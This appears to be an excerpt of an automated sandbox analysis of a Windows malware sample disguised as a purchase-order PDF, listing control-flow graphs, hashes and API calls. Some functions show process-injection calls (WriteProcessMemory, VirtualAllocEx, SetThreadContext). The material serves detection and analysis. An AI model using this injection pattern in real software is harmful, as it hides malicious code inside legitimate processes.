1840 5f25d47-5f25d5e 1837->1840 1844 5f25c35-5f25c4e 1838->1844 1845 5f25c2b 1838->1845 1840->1839 1848 5f25d60-5f25d6a 1840->1848 1844->1829 1845->1844 1851 5f25d6c-5f25d7b 1848->1851 1852 5f25d7d-5f25d8d 1848->1852 1851->1852 1856->1837 1857->1837 1858->1837
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1765592756.0000000005F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5f20000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (bq$d
                                            • API String ID: 0-3334038649
                                            • Opcode ID: 360fb65307e732e377f413be9ad698b6a6de3c1264aae10c18b83b25aef26bd0
                                            • Instruction ID: 8015e9d7bafe94677b120856c295f58c8804a8f7a1b5aa307f63df52cfb620c7
                                            • Opcode Fuzzy Hash: 360fb65307e732e377f413be9ad698b6a6de3c1264aae10c18b83b25aef26bd0
                                            • Instruction Fuzzy Hash: ADD16A747006168FCB14DF29C48496AB7F2FF88310B69C969E45A9B355EB38FD42CB90
                                            Function 01183EC8 Relevance: 2.7, Strings: 2, Instructions: 238COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1955 1183ec8 1956 118410c-1184125 1955->1956 1958 1184137-1184150 1956->1958 1959 1184127-1184132 1956->1959 1974 118417a 1958->1974 1975 1184152-118415e 1958->1975 1960 1183ed9-1183ee2 1959->1960 1961 1183eeb-1183eec 1960->1961 1962 1183ee4 1960->1962 1969 1183eee-1183f0d 1961->1969 1962->1956 1962->1958 1962->1961 1964 1183f68-1183f87 1962->1964 1965 1183f4b-1183f5d 1962->1965 1966 11840ab-11840bf 1962->1966 1967 1183fcc 1962->1967 1968 118424d-11842ac 1962->1968 1962->1969 1970 11842c0-11842d4 1962->1970 1971 1183f62-1183f63 1962->1971 1972 11840c4-1184107 1962->1972 1973 11841c5-1184208 1962->1973 1964->1956 1991 1183f8d-1183fb6 1964->1991 1965->1960 1976 11842d6-1184315 1966->1976 1982 1183fd8-11840a6 1967->1982 1968->1960 2007 11842b2-11842bb 1968->2007 1969->1956 1989 1183f13-1183f3c 1969->1989 1970->1976 1971->1956 1972->1960 1973->1967 2010 118420e-1184237 1973->2010 1980 1184180-11841af 1974->1980 1977 1184168-118416e 1975->1977 1978 1184160-1184166 1975->1978 2003 1184324-118432d 1976->2003 2004 1184317-1184322 1976->2004 1984 1184178 1977->1984 1978->1984 1980->1960 1996 11841b5-11841c0 1980->1996 1982->1960 1984->1980 1989->1960 2006 1183f3e-1183f49 1989->2006 1991->1960 2001 1183fbc-1183fc7 1991->2001 1996->1960 2001->1960 2008 118432f 2003->2008 2009 1184336-1184337 2003->2009 2004->2003 2006->1960 2007->1960 2011 1184339-118436e 2008->2011 2012 118437d-118437e 2008->2012 2013 1184380-1184387 2008->2013 2014 11843c4-1184419 2008->2014 2009->2011 2009->2012 2010->1960 2020 118423d-1184248 2010->2020 2011->2003 2030 1184370-118437b 2011->2030 2012->2014 2013->2011 2017 1184389-11843a3 2013->2017 2022 118441b-118444c 2014->2022 2023 11843a6-11843b0 2014->2023 2017->2023 2020->1960 2025 11828bd-11828c8 2022->2025 2026 1184452-118445d 2022->2026 2023->2003 2028 11843b6-11843bf 2023->2028 2031 11828ca-11881c7 2025->2031 2032 11828d1-1183949 2025->2032 2026->2025 2028->2003 2030->2003 2041 11881c9 2031->2041 2042 11881ce-1188212 2031->2042 2037 1183954-1183961 2032->2037 2039 11879c7-11879f0 2037->2039 2040 1183967-1183990 2037->2040 2039->2025 2040->2025 2046 1183996-11839a1 2040->2046 2041->2042 2042->2025 2050 1188218-1188223 2042->2050 2046->2025 2050->2025
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1753535503.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_1180000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: PH^q$`Q^q
                                            • API String ID: 0-3163867966
                                            • Opcode ID: 1deb273bf8ec0b50ec11ea79533abb3a2d0257b2df33895d30db9891d61713e5
                                            • Instruction ID: fa6062ddb2cf8d2ba1b3c7c19b2f2e428206847782526e4e6730b7593fd15c49
                                            • Opcode Fuzzy Hash: 1deb273bf8ec0b50ec11ea79533abb3a2d0257b2df33895d30db9891d61713e5
                                            • Instruction Fuzzy Hash: 8FC1C874E15229CFEB28EF25D8497AABBF0BB48305F04C4D9D489A2680DF715AC0CF91
                                            Function 05F243D0 Relevance: 2.7, Strings: 2, Instructions: 187COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 2051 5f243d0-5f24408 2053 5f244f4-5f24519 2051->2053 2054 5f2440e-5f24412 2051->2054 2063 5f24520-5f24544 2053->2063 2055 5f24426-5f2442a 2054->2055 2056 5f24414-5f24420 2054->2056 2057 5f24430-5f24447 2055->2057 2058 5f2454b-5f24570 2055->2058 2056->2055 2056->2063 2069 5f2445b-5f2445f 2057->2069 2070 5f24449-5f24455 2057->2070 2077 5f24577-5f2459b 2058->2077 2063->2058 2072 5f24461-5f2447a 2069->2072 2073 5f2448b-5f244a4 call 5f210a8 2069->2073 2070->2069 2070->2077 2072->2073 2086 5f2447c-5f2447f 2072->2086 2084 5f244a6-5f244ca 2073->2084 2085 5f244cd-5f244f1 2073->2085 2093 5f2459f-5f245a9 2077->2093 2090 5f24488 2086->2090 2090->2073 2093->2093 2094 5f245aa-5f245ca 2093->2094 2096 5f24602-5f24627 2094->2096 2097 5f245cc-5f245ec 2094->2097 2104 5f2462e-5f2465d 2096->2104 2097->2104 2105 5f245ee-5f245ff 2097->2105 2111 5f2465f-5f24668 2104->2111 2111->2111 2112 5f2466b 2111->2112
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1765592756.0000000005F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5f20000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (bq$(bq
                                            • API String ID: 0-4224401849
                                            • Opcode ID: 2f59e0b5e7a8ab6b87c1a448e75b8143f78dcf3c9b72f23909bb7878e2887069
                                            • Instruction ID: 0e1595fa779bbbff0eefab4976e6244e53d9f8de4f06b469a9e696c7114432ac
                                            • Opcode Fuzzy Hash: 2f59e0b5e7a8ab6b87c1a448e75b8143f78dcf3c9b72f23909bb7878e2887069
                                            • Instruction Fuzzy Hash: 9B51BB757042258FDB05DF29D885BAE3BA2FF84312F148569E8068B391CF78DC46CB90
                                            Function 05F21E28 Relevance: 2.7, Strings: 2, Instructions: 175COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 2113 5f21e28-5f21e3a 2114 5f21e40-5f21e42 2113->2114 2115 5f21f2e-5f21f53 2113->2115 2116 5f21f5a-5f21f7e 2114->2116 2117 5f21e48-5f21e54 2114->2117 2115->2116 2129 5f21f85-5f21fa9 2116->2129 2121 5f21e56-5f21e62 2117->2121 2122 5f21e68-5f21e78 2117->2122 2121->2122 2121->2129 2122->2129 2130 5f21e7e-5f21e8c 2122->2130 2134 5f21fb0-5f22033 2129->2134 2133 5f21e92-5f21e97 2130->2133 2130->2134 2165 5f21e99 call 5f21e23 2133->2165 2166 5f21e99 call 5f21e28 2133->2166 2167 5f21e99 call 5f22028 2133->2167 2156 5f2203a-5f22048 call 5f21170 2134->2156 2136 5f21e9f-5f21ee8 2151 5f21eea-5f21f03 2136->2151 2152 5f21f0b-5f21f2b 2136->2152 2151->2152 2161 5f22060-5f22062 2156->2161 2162 5f2204a-5f22050 2156->2162 2163 5f22052 2162->2163 2164 5f22054-5f22056 2162->2164 2163->2161 2164->2161 2165->2136 2166->2136 2167->2136
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1765592756.0000000005F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5f20000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (bq$Hbq
                                            • API String ID: 0-4081012451
                                            • Opcode ID: 510a35f1fb0818ba70b0e6ec8c704ee0a981f97fccbf542f8ffdf560b09ad7c8
                                            • Instruction ID: 99d48413cbbc43238e29b3f9de1aab88e5c4fa6a973e35d7fc6740625ee9a0ef
                                            • Opcode Fuzzy Hash: 510a35f1fb0818ba70b0e6ec8c704ee0a981f97fccbf542f8ffdf560b09ad7c8
                                            • Instruction Fuzzy Hash: 95519C78B042148FD719EF38D854A2E7BB3BF85301B504868E5068B3A4DF39ED06CB95
                                            Function 061FB0D7 Relevance: 2.5, Strings: 2, Instructions: 49COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 2192 61fb0d7-61fb12f 2208 61fb132 call 621eb90 2192->2208 2209 61fb132 call 621eb8a 2192->2209 2195 61fb134-61fb141 2196 61fb147-61fb169 2195->2196 2197 61fc171-61fc1aa 2195->2197 2198 61fb16f-61fb17a 2196->2198 2199 61fb032-61fb03b 2196->2199 2197->2199 2201 61fc1b0-61fc1bb 2197->2201 2198->2199 2202 61fb03d-61fb52c 2199->2202 2203 61fb044-61fbf2a 2199->2203 2201->2199 2202->2199 2207 61fb532-61fb53d 2202->2207 2203->2199 2207->2199 2208->2195 2209->2195
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1766207440.00000000061F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_61f0000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $5
                                            • API String ID: 0-1616362103
                                            • Opcode ID: ac963f7ac44cbfbcf599826240e6d898002b21120306e924b83c2d3218efad89
                                            • Instruction ID: 9df2988bb0b1c9945709f1cc7f87624c6f1e196292bd295b22a7dc4f661dda72
                                            • Opcode Fuzzy Hash: ac963f7ac44cbfbcf599826240e6d898002b21120306e924b83c2d3218efad89
                                            • Instruction Fuzzy Hash: 3F21D374E4122ACFEB60DF54CA58BE9BBF5BB09304F1480E9D519A7240D7755E85CF00
                                            Function 061FB640 Relevance: 2.5, Strings: 2, Instructions: 44COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 2210 61fb640-61fb6a1 2225 61fb6a4 call 621eb90 2210->2225 2226 61fb6a4 call 621eb8a 2210->2226 2213 61fb6a6-61fb6b3 2214 61fc14a-61fc16c 2213->2214 2215 61fb6b9-61fb6d8 2213->2215 2216 61fb6de-61fb6e9 2215->2216 2217 61fb032-61fb03b 2215->2217 2216->2217 2219 61fb03d-61fb52c 2217->2219 2220 61fb044-61fbf2a 2217->2220 2219->2217 2224 61fb532-61fb53d 2219->2224 2220->2217 2224->2217 2225->2213 2226->2213
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1766207440.00000000061F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_61f0000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 1$=
                                            • API String ID: 0-1936259842
                                            • Opcode ID: ff161c824c25418a4535a32f127c2c654272463f0d3895c478360608b572e205
                                            • Instruction ID: 2b43991525efb6fcf4f91ff8825e43a26fdd30667cfe947b9032c0e1fcdef396
                                            • Opcode Fuzzy Hash: ff161c824c25418a4535a32f127c2c654272463f0d3895c478360608b572e205
                                            • Instruction Fuzzy Hash: 7621CFB4D0122CCFDBA0DF58C988BD9BBB1AB08304F1485DAD559A7250DB769EC2CF90
                                            Function 061FBA21 Relevance: 2.5, Strings: 2, Instructions: 43COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1766207440.00000000061F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_61f0000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 2$8
                                            • API String ID: 0-21279188
                                            • Opcode ID: 401d3bc99fb10caa3e9f81e6d195d946ab6f70cc548445c3b4d5cce94c4c1cd3
                                            • Instruction ID: 2a734a4113277e505af275899aa07669ee119f2fc3fa04a7a34dcfd41f9c9460
                                            • Opcode Fuzzy Hash: 401d3bc99fb10caa3e9f81e6d195d946ab6f70cc548445c3b4d5cce94c4c1cd3
                                            • Instruction Fuzzy Hash: 3821EF74902268CFDBA0CF58CA58B9DBBB1FB48304F1480D9E509AB354D7769E85CF00
                                            Function 061FB341 Relevance: 2.5, Strings: 2, Instructions: 39COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1766207440.00000000061F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_61f0000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 2$8
                                            • API String ID: 0-21279188
                                            • Opcode ID: a77811fbc4b5101ec412ef88d68c8017c2d1c418eec19d49a69b6fc1078be0e8
                                            • Instruction ID: 63364a81a6246e598bfde0c8f0b7c429b289779141cc9afbc75b7c636d5cf2a8
                                            • Opcode Fuzzy Hash: a77811fbc4b5101ec412ef88d68c8017c2d1c418eec19d49a69b6fc1078be0e8
                                            • Instruction Fuzzy Hash: 2E11DF74A02268DFCBA4DF54DD58B9DB7B1BB88304F5084D9E509AB344DB355E85CF00
                                            Function 063A6DD2 Relevance: 2.5, Strings: 2, Instructions: 37COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1766732874.00000000063A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_63a0000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: %$g
                                            • API String ID: 0-3824764996
                                            • Opcode ID: 7c5f6aea2195054fb6ba64836cd706647e2947b3d38ae05a15637cc0a985cd88
                                            • Instruction ID: 5f4364766a0676f2dd54577085bf2df6c3ae2512ba72a0c8f6847ecd09adb7de
                                            • Opcode Fuzzy Hash: 7c5f6aea2195054fb6ba64836cd706647e2947b3d38ae05a15637cc0a985cd88
                                            • Instruction Fuzzy Hash: E41103749052298FDB68DF68D884AD9BBF1EB08309F1040E9E45EA3744DB349E85EF41
                                            Function 061FB21E Relevance: 2.5, Strings: 2, Instructions: 23COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1766207440.00000000061F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_61f0000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: &$;
                                            • API String ID: 0-2204298178
                                            • Opcode ID: b62f0b6ad832ec3d521f4e7c5c1b2616b8ba4a43e5b74e7745e8c6a5f02f0f76
                                            • Instruction ID: 2e72ac2be4e7d7c851f16b224fe3951d80c7fba777c9eb7a64ae16ccb50d431c
                                            • Opcode Fuzzy Hash: b62f0b6ad832ec3d521f4e7c5c1b2616b8ba4a43e5b74e7745e8c6a5f02f0f76
                                            • Instruction Fuzzy Hash: 24F012B4902229CFDBA0DF24CA88BCDBBF1AB08358F5084E9D109A3244D3769A95CF10
                                            Function 05F28E80 Relevance: 1.9, Strings: 1, Instructions: 677COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1765592756.0000000005F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5f20000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: ,bq
                                            • API String ID: 0-2474004448
                                            • Opcode ID: 420ceb6e9a00a1c20a4adda5f27a38219481ea8c1a76058db6cd66cafe404a0e
                                            • Instruction ID: ad3daa27d38acbedb993e4070d8c46a0e9472621f6686c47df7dfa72118bc4a4
                                            • Opcode Fuzzy Hash: 420ceb6e9a00a1c20a4adda5f27a38219481ea8c1a76058db6cd66cafe404a0e
                                            • Instruction Fuzzy Hash: 88521BB5A002288FDB64CF69C981BDDBBF6BF88300F1544D9E509A7351DA789E80CF61
                                            Function 05F233E0 Relevance: 1.8, Strings: 1, Instructions: 531COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1765592756.0000000005F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5f20000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (_^q
                                            • API String ID: 0-538443824
                                            • Opcode ID: a1abf752d493ad122aa54d6b9766dd7bdde83a9627790401472180fd71653a88
                                            • Instruction ID: 6df59e73b04e0496352aa42b7db4da9c4f28ceea50737246ff02c8f6d6775f75
                                            • Opcode Fuzzy Hash: a1abf752d493ad122aa54d6b9766dd7bdde83a9627790401472180fd71653a88
                                            • Instruction Fuzzy Hash: 76228FB5B002149FDB04DF65D494A6DBBF6BF88300F148869E906AF3A1DB79ED41CB90
                                            Function 0621DD04 Relevance: 1.8, APIs: 1, Instructions: 271processCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0621DF77
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1766300402.0000000006210000.00000040.00000800.00020000.00000000.sdmp, Offset: 06210000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6210000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID: CreateProcess
                                            • String ID:
                                            • API String ID: 963392458-0
                                            • Opcode ID: cd98440d2457712ba59383ab502863b2e3791be1eb466cdc548b50e69c43179c
                                            • Instruction ID: 8520208f854d84c93265e0550bfa32cf6f3b35def8887369af09554ba6441971
                                            • Opcode Fuzzy Hash: cd98440d2457712ba59383ab502863b2e3791be1eb466cdc548b50e69c43179c
                                            • Instruction Fuzzy Hash: 82A100B0D14219CFDB60CFA9C885BEEBBF1BF19300F149569E858AB280DB749985CF45
                                            Function 0621DD10 Relevance: 1.8, APIs: 1, Instructions: 261processCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0621DF77
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1766300402.0000000006210000.00000040.00000800.00020000.00000000.sdmp, Offset: 06210000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6210000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID: CreateProcess
                                            • String ID:
                                            • API String ID: 963392458-0
                                            • Opcode ID: 4dccdf2758b856f29e62c230a3b4d9332570850409f4fc544238f72162c31b6a
                                            • Instruction ID: 69392af72fdd6656d277cc4b3f3f38f6ba88040446bbd249f05358f75770d8e7
                                            • Opcode Fuzzy Hash: 4dccdf2758b856f29e62c230a3b4d9332570850409f4fc544238f72162c31b6a
                                            • Instruction Fuzzy Hash: 38A10FB0D14219CFDB50CFA9C8817EEBBF1BF19310F14956AE858AB280DB749985CF45
                                            Function 0621EB8A Relevance: 1.6, APIs: 1, Instructions: 118injectionCOMMON
                                            Download Yara Rule
                                            APIs
                                            • WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 0621EC63
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1766300402.0000000006210000.00000040.00000800.00020000.00000000.sdmp, Offset: 06210000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6210000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID: MemoryProcessWrite
                                            • String ID:
                                            • API String ID: 3559483778-0
                                            • Opcode ID: 6e866e60d4f373e0d0dbc9a1cb1474a9a817e3194359caa59310d5227afdd992
                                            • Instruction ID: 98e12497430fcdc7d1a4a5a878ae24dc63765360a5492cd24090a08a9c2ed577
                                            • Opcode Fuzzy Hash: 6e866e60d4f373e0d0dbc9a1cb1474a9a817e3194359caa59310d5227afdd992
                                            • Instruction Fuzzy Hash: 0B419AB4D052589FCB00CFA9D984ADEFBF1BB59310F20902AE819BB250D775AA45CF64
                                            Function 0621EB90 Relevance: 1.6, APIs: 1, Instructions: 116injectionCOMMON
                                            Download Yara Rule
                                            APIs
                                            • WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 0621EC63
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1766300402.0000000006210000.00000040.00000800.00020000.00000000.sdmp, Offset: 06210000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6210000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID: MemoryProcessWrite
                                            • String ID:
                                            • API String ID: 3559483778-0
                                            • Opcode ID: ff42b10ba058034b9c157c121c67e7effd2f7cd46684375a0f076db3e4ae383e
                                            • Instruction ID: 3ce1079748f5399bcf66d45980d4f432a0c376acc16a57778130e6515dde4019
                                            • Opcode Fuzzy Hash: ff42b10ba058034b9c157c121c67e7effd2f7cd46684375a0f076db3e4ae383e
                                            • Instruction Fuzzy Hash: CA41AAB4D052589FCF00CFA9D984ADEFBF1BB59310F20902AE819BB240D774AA45CF64
                                            Function 0621F078 Relevance: 1.6, APIs: 1, Instructions: 104memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0621F124
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1766300402.0000000006210000.00000040.00000800.00020000.00000000.sdmp, Offset: 06210000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6210000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID: ProtectVirtual
                                            • String ID:
                                            • API String ID: 544645111-0
                                            • Opcode ID: 9320d9b5942077ea8408066af07268ed4ec6d863945fab6b150e9a15076df2be
                                            • Instruction ID: 5471e9cbafdb3fcc59fc7b0b3a928021d83f4f69a3f5a336d3f41b8658b00afe
                                            • Opcode Fuzzy Hash: 9320d9b5942077ea8408066af07268ed4ec6d863945fab6b150e9a15076df2be
                                            • Instruction Fuzzy Hash: A031DBB4D152189FCF10CFA9E984AEEFBF1BB59310F10902AE818B7250D735A945CF64
                                            Function 0621EA2F Relevance: 1.6, APIs: 1, Instructions: 102memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0621EADA
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1766300402.0000000006210000.00000040.00000800.00020000.00000000.sdmp, Offset: 06210000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6210000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID: AllocVirtual
                                            • String ID:
                                            • API String ID: 4275171209-0
                                            • Opcode ID: 139c5c80cab1181d1325846ff7f1f1990767a4e1e3dacb81864e0d3d54c02f1f
                                            • Instruction ID: a748af117e40551ee8349d44eeb2ddc6bc1415a6759354c4514dc118e2c99083
                                            • Opcode Fuzzy Hash: 139c5c80cab1181d1325846ff7f1f1990767a4e1e3dacb81864e0d3d54c02f1f
                                            • Instruction Fuzzy Hash: FF31A9B8D042589FCF10CFA9D880ADEFBB1FB59310F10902AE815B7200D735A945CF65
                                            Function 0621EA30 Relevance: 1.6, APIs: 1, Instructions: 101memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0621EADA
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1766300402.0000000006210000.00000040.00000800.00020000.00000000.sdmp, Offset: 06210000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6210000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID: AllocVirtual
                                            • String ID:
                                            • API String ID: 4275171209-0
                                            • Opcode ID: 2f7f423104d05cfa8aa5f52b6edf083f5e4fcc8750dfab7d2157d0d0ef60cc02
                                            • Instruction ID: ed764594d0c4cb06c2ef5a2c8d48927733bae5e155364cb1b25bdbb87884e0dc
                                            • Opcode Fuzzy Hash: 2f7f423104d05cfa8aa5f52b6edf083f5e4fcc8750dfab7d2157d0d0ef60cc02
                                            • Instruction Fuzzy Hash: 6331A9B4D042589FCF10CFA9D880ADEFBB1FB59310F10902AE815B7200D735A945CF55
                                            Function 0621E0C0 Relevance: 1.6, APIs: 1, Instructions: 99threadCOMMON
                                            Download Yara Rule
                                            APIs
                                            • Wow64SetThreadContext.KERNEL32(?,?), ref: 0621E177
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1766300402.0000000006210000.00000040.00000800.00020000.00000000.sdmp, Offset: 06210000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6210000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID: ContextThreadWow64
                                            • String ID:
                                            • API String ID: 983334009-0
                                            • Opcode ID: 30027cd22560476160f15cfbe461a41cee9c205cd7c4f29c55be6e465fd139ca
                                            • Instruction ID: ad1aeb4232259a131748238b489223644304a36b0ab120b538178f45fb279e91
                                            • Opcode Fuzzy Hash: 30027cd22560476160f15cfbe461a41cee9c205cd7c4f29c55be6e465fd139ca
                                            • Instruction Fuzzy Hash: 2641CCB4D112589FCB10CFA9D884AEEFBF1BF49310F24842AE859B7240D738A985CF54
                                            Function 0621F080 Relevance: 1.6, APIs: 1, Instructions: 98memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0621F124
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1766300402.0000000006210000.00000040.00000800.00020000.00000000.sdmp, Offset: 06210000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6210000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID: ProtectVirtual
                                            • String ID:
                                            • API String ID: 544645111-0
                                            • Opcode ID: dbdae45170152f7da68197b8f3b8473548c55fd1ff72b15dbc23816c9730ecdc
                                            • Instruction ID: 15cbfcff11d14e0b53d2bbd4709bc36894f6630cb02bc649399158ac3831e436
                                            • Opcode Fuzzy Hash: dbdae45170152f7da68197b8f3b8473548c55fd1ff72b15dbc23816c9730ecdc
                                            • Instruction Fuzzy Hash: 7931C9B4D042589FCF10CFAAD984AEEFBF1BB59320F20942AE819B7250D735A945CF54
                                            Function 05EE0799 Relevance: 1.6, APIs: 1, Instructions: 98memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • VirtualProtect.KERNEL32(?,?,?,?), ref: 05EE0844
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1765476186.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5ee0000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID: ProtectVirtual
                                            • String ID:
                                            • API String ID: 544645111-0
                                            • Opcode ID: 64cb1a36214afba047fd493c2ccae8de234be46aaa1a765cec300c74cf6f0579
                                            • Instruction ID: cafc5d1b42085ca2584d1ea4a3809c9f32d1c7e55206ec616586c6f3d9e83a43
                                            • Opcode Fuzzy Hash: 64cb1a36214afba047fd493c2ccae8de234be46aaa1a765cec300c74cf6f0579
                                            • Instruction Fuzzy Hash: EF31C8B4D002489FCB14CFA9D884ADEFBB1BB49320F10A42AE818B7200D775A945CF98
                                            Function 05EE07A0 Relevance: 1.6, APIs: 1, Instructions: 96memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • VirtualProtect.KERNEL32(?,?,?,?), ref: 05EE0844
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1765476186.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5ee0000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID: ProtectVirtual
                                            • String ID:
                                            • API String ID: 544645111-0
                                            • Opcode ID: c35b4fff939ba01130effcf503bb98e321ceea23f331b7ef7a694fbc7e82ce4e
